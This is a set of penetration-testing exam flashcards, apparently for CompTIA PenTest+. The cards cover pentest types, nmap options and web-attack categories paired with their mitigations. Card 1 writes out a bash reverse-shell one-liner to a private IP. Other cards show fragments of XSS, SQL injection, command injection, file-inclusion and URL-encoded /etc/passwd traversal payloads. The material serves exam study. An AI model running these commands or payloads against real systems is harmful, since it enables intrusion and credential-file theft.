Need2Know Flashcards

1
Q

bash -i >& /dev/tcp/192.168.0.1/80 0> &1

A

opens a remote shell to 192.168.0.1:80

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

SIMULATION -
You are a penetration tester running port scans on a server.

INSTRUCTIONS -
Part1: Given the output, construct the command that was used to generate this output from the available options.

Part2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

A
  1. nmap -sV -O –top-ports 100 192.168.2.2

So you can see in the output it says “OS and Service detection performed” ( aka -sV and -O)
by default nmap scans the top 1000 ports so they had to specifiy –top-ports 100, it shows 4 ports and at the top of the output says 96 closed ports.

  1. Null session attack & weak smb file permissions.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

The art of packet crafting can be divided into four phases

A

packet….

  1. assembly
  2. editing
  3. play
  4. decoding
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Goal-based Pentest

A

attempt to achieve specific goals

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Objective Based Pentest

A

uses all methods - accurately simulates a real attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Compliance-based pentest

A

objectives are clearly defined.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Red Team

A

pentest conducted by internal pentesters during exercise to ensure defenders (Blue Team) can do their jobs

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

https://www.examtopics.com/exams/comptia/pt0-001/view/4/

  1. Reflected XSS ————– alert(1)
  2. Sql Injection Stacked —-.item=widget….%20’00:00:20’; –
  3. DOM XSS ——————…%3dalert (1) % 3e
  4. Local File Inclusion —- logfile=%2fetc%2fpasswd%00
  5. Command Injection – site=www.exa’ping%20-……
  6. SQLi union —————item=widget%20union…
  7. SQLi error —————–item=widget+convert…
  8. Remote File Inclusion -logfile=http:%2f%2fwww.malicious…
  9. Command Injection — lookup=$(whoami)
  10. URL redirect————-redir=http:…..
A
    • Input sanitization (<> …)
    • Parameterized Queries
    • Input Sanitization (<> …)
    • sandbox req
    • sandbox req
    • paramtrized queries
    • paramtrized queries
    • sandbox
    • input saniti $
    • prevent external calls
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

NIST SP 800 Methodology

A

Planning, Discovery, Attack, Reporting (PDAR)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Given the output from the console above, which of the following explains how to correct the errors in the script? (Select
TWO)
A. Change fi\’ to \‘Endlf
B. Remove the \‘let\’ in front of \‘dest=5+5\’.
C. Change the \’=” to \‘-eq\’.
D. Change -Source* and \‘dest\’ to “$source” and “$dest”
E. Change \‘else\’ to \‘elif.

A

B,D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

URL Encoding

A

. == %2E
/ == %2F
\ == %5C

eg:
http://www.companysite.com/about.php?i=%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.

A
1 = #1/usr/bin/python
2 = ports = [21,22]
3 = for port in ports:
4 = port_scan(sys.argv[1], ports)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

password complexity

A

Zverlory
zv3rl0ry
Zverl0ry
Zv3r!0ry

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

The tester suspects it is an issue with string slicing and manipulation. Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment. Options may be used once or not at all.

A

nist
nsrt
imdA
strat

How well did you know this?
1
Not at all
2
3
4
5
Perfectly